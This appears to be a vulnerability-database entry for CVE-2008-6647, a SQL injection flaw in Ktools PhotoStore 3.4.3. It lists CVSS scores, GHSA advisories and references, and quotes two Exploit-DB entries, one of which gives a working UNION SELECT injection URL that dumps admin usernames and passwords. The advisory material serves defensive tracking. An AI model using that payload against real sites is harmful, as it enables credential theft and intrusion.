CVE-2008-6647
Published: 2009-04-07
CVE-2008-6647: SQL injection vulnerability in gallery.php in Ktools PhotoStore 3.4.3 allows remote attackers to execute arbitrary SQL commands via the gid parameter.
Priority: P3 · 41 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 1.01% (58.8th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ktools | photostore | — | — |
| ktools | photostore | — | — |
GHSA
GHSA-799w-4vcg-xxx7: SQL injection vulnerability in crumbs (CVE-2008-6648, HIGH, CWE-89, CVSS 7.5, ghsa_unreviewed, 2022-05-17)
SQL injection vulnerability in crumbs.php in Ktools PhotoStore 3.4.3 and 3.5.2 allows remote attackers to execute arbitrary SQL commands via the gid parameter to about_us.php. NOTE: this might be the same issue as CVE-2008-6647.
GHSA
GHSA-hxm7-55m9-pqcf: SQL injection vulnerability in gallery (CVE-2008-6647, HIGH, CWE-89, ghsa_unreviewed, 2022-05-17)
SQL injection vulnerability in gallery.php in Ktools PhotoStore 3.4.3 allows remote attackers to execute arbitrary SQL commands via the gid parameter.
No detection rules found.
Exploit-DB
Ktools Photostore 3.5.2 - Multiple SQL Injections (exploitdb, 2008-05-10, CVE-2008-6649)
---
\#'#/
(-.-)
-------------------------oOO---(_)---OOo-------------------------
| Ktools Photostore <= v3.5.2 (crumbs.php) Remote SQL Injection |
| (works only with magic quotes = off) |
| coded by DNX |
[!] Discovered.: DNX
[!] Vendor.....: http://www.ktools.net
[!] Detected...: 27.04.2008
[!] Reported...: 29.04.2008
[!] Response...: xx.xx.2008
[!] Background.: PhotoStore allows you to setup a complete photo selling
website on your server or hosting space in just minutes.
[!] Price......: $295 Oo.
[!] Bug........: $_GET['gid'] in crumbs.php near line 11
```php
05: if($_GET['gid']){
08: function crumbs($gid){
09:     global $db, $crumb_array_name, $crumb_array_id;
10:
11:     $ca_result = mysql_query("SELECT id,title,nest_under FROM photo_galleri
```
Exploit-DB
Ktools Photostore 3.5.1 - 'gid' SQL Injection (exploitdb, 2008-05-09, CVE-2008-6649)
---
#########################################
# Remote SQL Injection Vulnerability #
# #
# PhotoStore 3.4.3 ( gallery.php gid ) #
# #
#########################################
## Script NAME : PhotoStore
## VERSION : 3.4.3
## DOWNLOAD : http://www.ktools.net/
#########################################
## AuTh0r : Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
#########################################
## D0rk :: n/a ;)
################################################################################
## ExPlo!t For ADMIN INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*
#############
## Explo!T For Users INFO
No writeups or analysis indexed.
References
http://osvdb.org/45140
http://secunia.com/advisories/30194
http://www.securityfocus.com/bid/29132
https://exchange.xforce.ibmcloud.com/vulnerabilities/42318
https://www.exploit-db.com/exploits/5580
Published: 2009-04-07